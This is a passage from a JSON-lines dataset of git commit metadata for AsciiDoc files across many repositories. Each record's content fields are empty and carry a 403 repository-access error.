2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a343ef457fcd428984ea150cf99e42c8edb0b8fa","subject":"Update 2018-05-07-try-gas-with-slack.adoc","message":"Update 2018-05-07-try-gas-with-slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9baed31034f33b1bb3a8ebe00de522af5eea957","subject":"Update 2015-02-17-Out-with-the-old-in-with-the.adoc","message":"Update 2015-02-17-Out-with-the-old-in-with-the.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-02-17-Out-with-the-old-in-with-the.adoc","new_file":"_posts\/2015-02-17-Out-with-the-old-in-with-the.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3315fa76d815836dc82c20395c73bbaad9626172","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7fb218f6edfdc32e56da3ddc53edf95b26c732a","subject":"fixed tutorial on startup order: I fixed the app source code in other repo to avoid the issue.","message":"fixed tutorial on startup order: I fixed the app source code in other repo to avoid the issue.\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d0afb5fecbb5692d0e37c78815b99f43e0727b70","subject":"Update 2016-10-19-algo-1074.adoc","message":"Update 2016-10-19-algo-1074.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-19-algo-1074.adoc","new_file":"_posts\/2016-10-19-algo-1074.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60eca0125c9383fa67b304b15b64728b8f153ceb","subject":"docs: improvements to NTP troubleshooting","message":"docs: improvements to NTP troubleshooting\n\nChange-Id: I07b6871b91ed4ee08992d2fcd093f1054c7d61b8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9234\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Kudu Jenkins\n","repos":"andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83cfff71027495a560281fd13bee67259def1708","subject":"y2b create post World's Most Powerful Gaming Tablet? -- Razer Edge Pro Unboxing \\u0026 Overview","message":"y2b create post World's Most Powerful Gaming Tablet? -- Razer Edge Pro Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-10-Worlds-Most-Powerful-Gaming-Tablet--Razer-Edge-Pro-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-10-Worlds-Most-Powerful-Gaming-Tablet--Razer-Edge-Pro-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b84c991f9647a0255bc8fcef535663f039288446","subject":"Update 2015-09-24-Fuck-you-Im-great.adoc","message":"Update 2015-09-24-Fuck-you-Im-great.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-09-24-Fuck-you-Im-great.adoc","new_file":"_posts\/2015-09-24-Fuck-you-Im-great.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a773e781ff1d321c036b55ff2a753de11883afa1","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"766c35bb76a10688cba01d2975af44bd2e84df5e","subject":"Update 2015-03-08-Les-Finlandais.adoc","message":"Update 2015-03-08-Les-Finlandais.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-08-Les-Finlandais.adoc","new_file":"_posts\/2015-03-08-Les-Finlandais.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2690972f8d98ec0c4ddddd52c3c7ee5bd8ae8f0d","subject":"Deleted 20161110-1232-showoff-zone-owo.adoc","message":"Deleted 20161110-1232-showoff-zone-owo.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232-showoff-zone-owo.adoc","new_file":"20161110-1232-showoff-zone-owo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a64064b0de955b69a609d76b5b370730601d02e","subject":"Update 2017-07-25-The-beginning.adoc","message":"Update 2017-07-25-The-beginning.adoc","repos":"raditv\/raditv.github.io,raditv\/raditv.github.io,raditv\/raditv.github.io,raditv\/raditv.github.io","old_file":"_posts\/2017-07-25-The-beginning.adoc","new_file":"_posts\/2017-07-25-The-beginning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raditv\/raditv.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"473e63f5731e2f06a82e64aa594d326d21a5d356","subject":"y2b create post Doritos Locos Taco Unboxing (Taco Bell Big Box)","message":"y2b create post Doritos Locos Taco Unboxing (Taco Bell Big Box)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-20-Doritos-Locos-Taco-Unboxing-Taco-Bell-Big-Box.adoc","new_file":"_posts\/2013-02-20-Doritos-Locos-Taco-Unboxing-Taco-Bell-Big-Box.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abac78e44713ea24795c512c00d347e5fad85794","subject":"Update 2016-06-10-A-W-S-Cloud-Watch-Google-Apps-Script.adoc","message":"Update 2016-06-10-A-W-S-Cloud-Watch-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-A-W-S-Cloud-Watch-Google-Apps-Script.adoc","new_file":"_posts\/2016-06-10-A-W-S-Cloud-Watch-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bfbdbe948241bd82c5297ad9ed95c14b040ac01","subject":"Update 2015-08-31-Welcome-on-board.adoc","message":"Update 2015-08-31-Welcome-on-board.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-08-31-Welcome-on-board.adoc","new_file":"_posts\/2015-08-31-Welcome-on-board.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9760629083c8f8274adffe7cadf8b45002c4ea2b","subject":"y2b create post Galaxy Note 3 Bend Test (iPhone 6 Plus Follow-up)","message":"y2b create post Galaxy Note 3 Bend Test (iPhone 6 Plus Follow-up)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-23-Galaxy-Note-3-Bend-Test-iPhone-6-Plus-Followup.adoc","new_file":"_posts\/2014-09-23-Galaxy-Note-3-Bend-Test-iPhone-6-Plus-Followup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe21003341c8fb56ea92abd618c2bc1f3bc0b5d0","subject":"[DOCS] Mute failing test snippet","message":"[DOCS] Mute failing test snippet\n\nOriginal commit: elastic\/x-pack-elasticsearch@0a2a90bbed2f5a6b1aec7be31b780ab4f29a7a5a\n","repos":"gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/rest-api\/ml\/put-datafeed.asciidoc","new_file":"docs\/en\/rest-api\/ml\/put-datafeed.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fb64ffda7c39e88375d6f4ddf9ead34f5752ba1","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8007a80cd98b9ed3fe4c08f6b5e737a57742b14","subject":"[DROOLS-2740] Added release note info (#940)","message":"[DROOLS-2740] Added release note info (#940)\n\n* Added release note info about DROOLS-2740 impact\r\n\r\n* Small refactoring\r\n","repos":"manstis\/kie-docs,jomarko\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs,michelehaglund\/kie-docs,manstis\/kie-docs","old_file":"docs\/shared-kie-docs\/src\/main\/asciidoc\/Workbench\/ReleaseNotes\/ReleaseNotesWorkbench.7.9.0.Final-section.adoc","new_file":"docs\/shared-kie-docs\/src\/main\/asciidoc\/Workbench\/ReleaseNotes\/ReleaseNotesWorkbench.7.9.0.Final-section.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jomarko\/kie-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e1ea87601ab9218dacacf9ffe913799999eca3a","subject":"Update 2015-10-11-Maven-in-5-Minutes.adoc","message":"Update 2015-10-11-Maven-in-5-Minutes.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cde5c01a93dc3f0dd0e41be554ecbd3f8d40fd5e","subject":"Update 2017-02-14-Smarter-Things-Hub.adoc","message":"Update 2017-02-14-Smarter-Things-Hub.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-14-Smarter-Things-Hub.adoc","new_file":"_posts\/2017-02-14-Smarter-Things-Hub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6472c79a61fe0b4eef59354e9c3e1ccbe150fe","subject":"Added robotics section","message":"Added robotics section\n","repos":"andrewazores\/homepage","old_file":"robotics.adoc","new_file":"robotics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andrewazores\/homepage.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"04401255bade1e1b6f1b79caba856d92e6690527","subject":"initial proposal to enable discussions","message":"initial proposal to enable discussions\n\nApply suggestions from code review\n\nCo-authored-by: George Gastaldi <gegastaldi@gmail.com>\nCo-authored-by: Guillaume Smet <guillaume.smet@gmail.com>\n\nUpdate adr\/0001-community-discussions.adoc\n\nCo-authored-by: Clement Escoffier <clement.escoffier@gmail.com>\n\nUpdate adr\/0001-community-discussions.adoc\n\nCo-authored-by: George Gastaldi <gegastaldi@gmail.com>\n\nUpdate adr\/0001-community-discussions.adoc\n\nCo-authored-by: George Gastaldi <gegastaldi@gmail.com>\n\nactually update right file\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"adr\/0001-community-discussions.adoc","new_file":"adr\/0001-community-discussions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ea4c285b6c1577a9bfaa93e35bebf1ae332a7fb","subject":"Update aggregation.asciidoc (#24042)","message":"Update aggregation.asciidoc (#24042)\n\nThere are four kinds of aggregations now, not three.","repos":"LeoYao\/elasticsearch,vroyer\/elassandra,jimczi\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elasticassandra,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,shreejay\/elasticsearch,lks21c\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,alexshadow007\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,sneivandt\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,maddin2016\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,nezirus\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,wenpos\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,jimczi\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,maddin2016\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,alexshadow007\/elasticsearch,nezirus\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,nazarewk\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,winstonewert\/elasticsearch","old_file":"docs\/reference\/aggregations.asciidoc","new_file":"docs\/reference\/aggregations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"145ba6184f3868c6057c58cc093d674dd95aec5c","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10dae6eb2d563970b418791ae8b1f704ef9ddeb5","subject":"Commit ex","message":"Commit ex\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Git\/Commit.adoc","new_file":"Git\/Commit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c68fb317271780e3aa97feba75a060e21556c772","subject":"Create fr\/besoin_du_langage.adoc","message":"Create fr\/besoin_du_langage.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"fr\/besoin_du_langage.adoc","new_file":"fr\/besoin_du_langage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"fe0c5cd3dcaff7502b64fb6da4e7e72302d77e2b","subject":"[DOCS] Update doc build info in README","message":"[DOCS] Update doc build info in README\n\nOriginal commit: elastic\/x-pack-elasticsearch@c93986436cd82a1480803698b8b3fe80e72d51e2\n","repos":"nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3012e054443504e0143735c0d3fc157827928472","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"wlzjdm\/wolf,wlzjdm\/wolf,wlzjdm\/wolf","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wlzjdm\/wolf.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b997d5c38b29be6826c79dbe996b67b79e7cbe6a","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3833364928cb7d1c11a06baa2c2ced17f5bdf6f","subject":"Update 